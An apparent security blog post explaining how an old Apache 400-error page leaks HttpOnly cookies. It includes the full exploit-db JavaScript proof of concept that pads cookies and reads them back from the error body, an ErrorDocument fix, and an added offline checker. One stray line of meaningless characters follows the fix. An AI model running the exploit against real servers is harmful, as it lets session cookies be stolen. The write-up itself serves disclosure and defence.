Many applications, including some commercial and mature open-source CMS/article systems, set the HttpOnly attribute on their cookies to stop XSS from stealing user cookies: the cookie can no longer be read directly from JavaScript, which lowers the impact of an XSS. The Apache issue described here bypasses exactly that protection, because the server's own 400 Bad Request page echoes the offending request headers, Cookie header included, into a response body that script can read.
Open a site in Chrome, press F12 to open the developer tools, switch to the Console, paste the following code and press Enter:
// http://www.exploit-db.com/exploits/18442/
function setCookies (good) {
    // Construct string for cookie value: 819 'x' characters
    var str = "";
    for (var i=0; i< 819; i++) {
        str += "x";
    }
    // Set cookies
    for (i = 0; i < 10; i++) {
        // Expire evil cookie
        if (good) {
            var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
        }
        // Set evil cookie
        else {
            var cookie = "xss"+i+"="+str+";path=/";
        }
        document.cookie = cookie;
    }
}

function makeRequest() {
    setCookies();
    function parseCookies () {
        var cookie_dict = {};
        // Only react on 400 status
        if (xhr.readyState === 4 && xhr.status === 400) {
            // Replace newlines and match <pre> content
            var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
            if (content && content.length) {
                // Remove Cookie: prefix
                content = content[1].replace("Cookie: ", "");
                // Drop the padding cookies, keep everything else
                var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
                // Add cookies to object
                for (var i=0; i<cookies.length; i++) {
                    var s_c = cookies[i].split('=',2);
                    cookie_dict[s_c[0]] = s_c[1];
                }
            }
            // Unset malicious cookies
            setCookies(true);
            alert(JSON.stringify(cookie_dict));
        }
    }
    // Make XHR request
    var xhr = new XMLHttpRequest();
    xhr.onreadystatechange = parseCookies;
    xhr.open("GET", "/", true);
    xhr.send(null);
}

makeRequest();
and you will see a gloriously verbose 400 error page with the cookie contents inside it. The alert shows the remaining cookies as JSON; the ten xss0..xss9 padding cookies are expired again by the script before the alert fires.
Download: https://gist.github.com/pilate/1955a1c28324d4724b7b/download
Fix:
Apache officially provides four ways of handling errors (http://httpd.apache.org/docs/2.0/mod/core.html#errordocument), as follows:
In the event of a problem or error, Apache can be configured to do one of four things:

1. output a simple hardcoded error message
2. output a customized message
3. redirect to a local URL-path to handle the problem/error
4. redirect to an external URL to handle the problem/error
In testing, only method 2 works for the 400 error: the response no longer contains the cookie contents.
Apache configuration:

ErrorDocument 400 "security test"
- C3 h) |( B ~! s8 R/ ]) f! z1 W: z% q' S* A( a
Of course, upgrading Apache to the latest version also fixes it :).
Reference: http://httpd.apache.org/security/vulnerabilities_22.html
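The padding and parsing logic of the technique, and the check for whether the fix took, as an added example that is not part of the original post or the exploit-db script: the exploit's steps are split into pure functions that run offline under Node. The two 400 bodies are constructed samples, one mimicking the vulnerable Apache page the post describes (the offending Cookie header echoed inside <pre>), the other carrying the "security test" message from the ErrorDocument 400 fix. The 8190-byte figure is Apache's default LimitRequestFieldSize, which the post's 10 x 819 padding is sized to exceed; the session cookie names and values in the samples are made up.

```javascript
// Added example, not the original post's code. Models the exploit's two
// halves as pure functions: how the padding cookies push the Cookie header
// over the server's limit, and how the echoed header is pulled out of the
// 400 page. Also gives a check that the ErrorDocument fix stopped the leak.

// Apache's default LimitRequestFieldSize is 8190 bytes; the exploit's
// 10 cookies x 819 'x' characters reach that on their own, so the cookie
// names and separators push the Cookie header over the limit.
const PADDING_COOKIES = 10;
const PADDING_LENGTH = 819;

// Build the cookie strings the exploit assigns to document.cookie.
// With expire=true the same names get a past Expires date so the browser
// drops them again once the request has been sent.
function buildPaddingCookies(expire) {
  const value = 'x'.repeat(PADDING_LENGTH);
  const past = new Date(Date.now() - 1).toUTCString();
  const out = [];
  for (let i = 0; i < PADDING_COOKIES; i++) {
    out.push(expire
      ? `xss${i}=;expires=${past}; path=/;`
      : `xss${i}=${value};path=/`);
  }
  return out;
}

// Length of the Cookie header the browser would send once the padding
// cookies sit beside the real ones ("name=value; name=value; ...").
function cookieHeaderLength(realCookies) {
  const padding = buildPaddingCookies(false).map(c => c.split(';')[0]);
  return realCookies.concat(padding).join('; ').length;
}

// Pull the echoed Cookie header out of a 400 body that shows the offending
// header inside <pre>...</pre>, as the vulnerable Apache versions did.
// Padding cookies are stripped; returns null when nothing is echoed.
function extractLeakedCookies(body) {
  const m = body.replace(/\r|\n/g, '').match(/<pre>(.+?)<\/pre>/);
  if (!m) return null;
  const raw = m[1].replace(/^\s*Cookie:\s*/, '');
  const cookies = {};
  for (const part of raw.replace(/xss\d=x+;?/g, '').split(';')) {
    const idx = part.indexOf('=');
    if (idx < 1) continue;
    cookies[part.slice(0, idx).trim()] = part.slice(idx + 1).trim();
  }
  return cookies;
}

// Check a server's 400 response: true when the body still carries the
// request's Cookie header, i.e. the ErrorDocument fix has not taken effect.
function leaksCookies(status, body) {
  if (status !== 400) return false;
  const leaked = extractLeakedCookies(body);
  return leaked !== null && Object.keys(leaked).length > 0;
}

// Constructed sample bodies. The first mimics the vulnerable page layout
// the post describes; the second is what ErrorDocument 400 "security test"
// sends instead. Cookie names and values are made up.
const VULNERABLE_400 = [
  '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">',
  '<html><head><title>400 Bad Request</title></head><body>',
  '<h1>Bad Request</h1>',
  '<p>Your browser sent a request that this server could not understand.<br />',
  'Size of a request header field exceeds server limit.<br />',
  '<pre>',
  'Cookie: PHPSESSID=a1b2c3d4e5; xss0=' + 'x'.repeat(819) +
    '; xss1=' + 'x'.repeat(819) + '; auth=sessiontoken',
  '</pre>',
  '</p></body></html>',
].join('\n');
const FIXED_400 = 'security test';

console.log('Cookie header bytes with padding:',
  cookieHeaderLength(['PHPSESSID=a1b2c3d4e5']));
console.log('leaked before fix:', extractLeakedCookies(VULNERABLE_400));
console.log('leaks after fix:', leaksCookies(400, FIXED_400));
```

Running the file prints the padded header size (8280 bytes for one real cookie), the two non-padding cookies recovered from the constructed vulnerable page, and `false` for the fixed page. To test a real server, send an oversized Cookie header to it and feed the status and body of the reply to leaksCookies; a 400 whose body still contains the Cookie line means the ErrorDocument change is not in effect.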